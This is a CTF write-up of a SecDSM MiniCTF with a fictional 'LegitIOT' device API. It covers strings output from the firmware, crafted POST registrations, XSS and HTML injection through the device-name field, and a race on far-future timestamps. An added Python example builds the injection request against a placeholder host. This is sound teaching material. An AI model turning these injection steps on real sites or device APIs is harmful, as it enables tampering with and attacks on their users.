
Internet of Sh**: SecDSM June MiniCTF

Antoinette Stevens

The June MiniCTF at SecDSM was all about an obscure IoT device and the API that controls it.

The challenge starts on the website for an IoT device called LegitIOT, which claims to have the very best security. The site is simple: a user can place an order, read the FAQ, or download the firmware.
The first two are useless for the challenge, so downloading the firmware is the route to take. After downloading the file, the first tool I run is strings.
Snippet: strings output from the firmware-latest.bin file

Calibration coefficients
Enter device name to begin setup
Enjoy your LegitBox
Begin setup by entering your location
Error: Invalid location (City, ST is supported format)
LegitBox setup complete
Enter device name
{"secret":"%s", "location":"%s", 
"name":"%s", "type":"%s", "date":"%s"}

POST %s/%s HTTP/1.0
post api/{endpoint}

Above are the interesting bits from the firmware, including how the device talks to its API: a JSON body with secret, location, name, type and date fields, sent as a POST to api/<endpoint>. This is a good time to bring out Burp's proxy or any other tool for manipulating HTTP requests, because you will need to craft a POST request to send to the server. I used a Firefox plugin called HTTP Requester on the advice of my coworker Nick, who also worked on the challenge with me. By POSTing to the API's register-device endpoint we were able to add our device to the list of registered devices. We validated this by GETting the list from the devices endpoint, which we found using DIRB. The device's website also showed a counter that incremented whenever a new device was registered and rendered data from the registration on the page, which gave us an opportunity to try some injection.


In the above image we did a standard cross-site scripting (XSS) test with alert('something').
Here, we did some HTML injection to get our names on the page.

The tricky part of this challenge was figuring out the greatest date/time possible. It became a race with other teams, because the registered devices were listed newest first: whoever submitted the most recent date/time was at the top of the list, and their payload was what the page rendered.

The listings follow the ISO 8601 format, YYYY-MM-DDThh:mm+00:00. Since the list is ordered by that value, a far-future timestamp that still parses puts your entry on top; that is what the race came down to.
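The registration flow described above (the JSON shape from the firmware, the POST to api/<endpoint>, the "City, ST" location check, and the newest-first ordering that drove the race) is pulled together below as an added example. This is not the author's code or the challenge's: the author used the HTTP Requester plugin by hand. The API host (BASE_URL), the secret value, the strictness of the location regex, and the device list used for sorting are all assumptions or constructed sample data; the firmware only tells us the request shape and the error message.

```python
"""Added example: reproduces the LegitBox registration flow implied by the firmware strings.

Assumptions (not from the original post): BASE_URL is a placeholder host, the
secret value is made up, and LOCATION_RE is a guess at how strict the firmware's
"City, ST" check is. Only the JSON shape, the POST %s/%s pattern and the error
text come from the strings output.
"""
import json
import re
import urllib.request
from datetime import datetime

# Placeholder host: the challenge server is offline and its URL is not in the post.
BASE_URL = "http://legitiot.example"

# Field order from the firmware's format string:
# {"secret":"%s", "location":"%s", "name":"%s", "type":"%s", "date":"%s"}
FIELDS = ("secret", "location", "name", "type", "date")

# The firmware complains "Invalid location (City, ST is supported format)";
# this regex is an assumed reconstruction of that check.
LOCATION_RE = re.compile(r"^[A-Za-z][A-Za-z .'-]*, [A-Z]{2}$")


def valid_location(location: str) -> bool:
    """Return True when the location looks like 'City, ST'."""
    return LOCATION_RE.fullmatch(location) is not None


def registration_body(secret: str, location: str, name: str, device_type: str, date: str) -> str:
    """Serialise the payload in the shape the firmware's format string shows.

    json.dumps escapes quotes, so an injected name such as
    <script>alert('something')</script> still ships as a valid JSON string;
    whether the server escapes it on the way back out is the injection test.
    """
    if not valid_location(location):
        raise ValueError("Invalid location (City, ST is supported format)")
    return json.dumps(dict(zip(FIELDS, (secret, location, name, device_type, date))))


def post_request(endpoint: str, body: str) -> urllib.request.Request:
    """Build (but do not send) the 'POST %s/%s' request the firmware issues."""
    return urllib.request.Request(
        f"{BASE_URL}/api/{endpoint}",
        data=body.encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def send(req: urllib.request.Request) -> bytes:
    """Send a built request and return the raw response body (needs network)."""
    with urllib.request.urlopen(req) as resp:
        return resp.read()


def iso8601_minutes(dt: datetime) -> str:
    """Render a UTC datetime as YYYY-MM-DDThh:mm+00:00, the listing format from the post."""
    return dt.strftime("%Y-%m-%dT%H:%M+00:00")


def newest_first(devices: list) -> list:
    """Order registrations the way the listing did: the latest 'date' takes the top slot."""
    return sorted(devices, key=lambda d: datetime.fromisoformat(d["date"]), reverse=True)


if __name__ == "__main__":
    # Constructed sample: three registrations, the last one with a far-future date.
    sample = [
        {"name": "team-a", "date": "2018-06-15T09:30+00:00"},
        {"name": "team-b", "date": "2018-06-15T09:31+00:00"},
        {"name": "<b>team-c</b>", "date": iso8601_minutes(datetime(9999, 12, 31, 23, 59))},
    ]
    print(newest_first(sample)[0]["name"])
    body = registration_body("made-up-secret", "Des Moines, IA", "<b>team-c</b>",
                             "LegitBox", sample[2]["date"])
    print(post_request("register-device", body).full_url)
```

Run it as-is and it only builds the request and sorts the constructed list; call send() yourself against a real host. The sorting function is the point of the race: whichever entry parses to the largest datetime is rendered first, so a payload in the name field of that entry is what everyone sees.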

* This challenge is currently offline *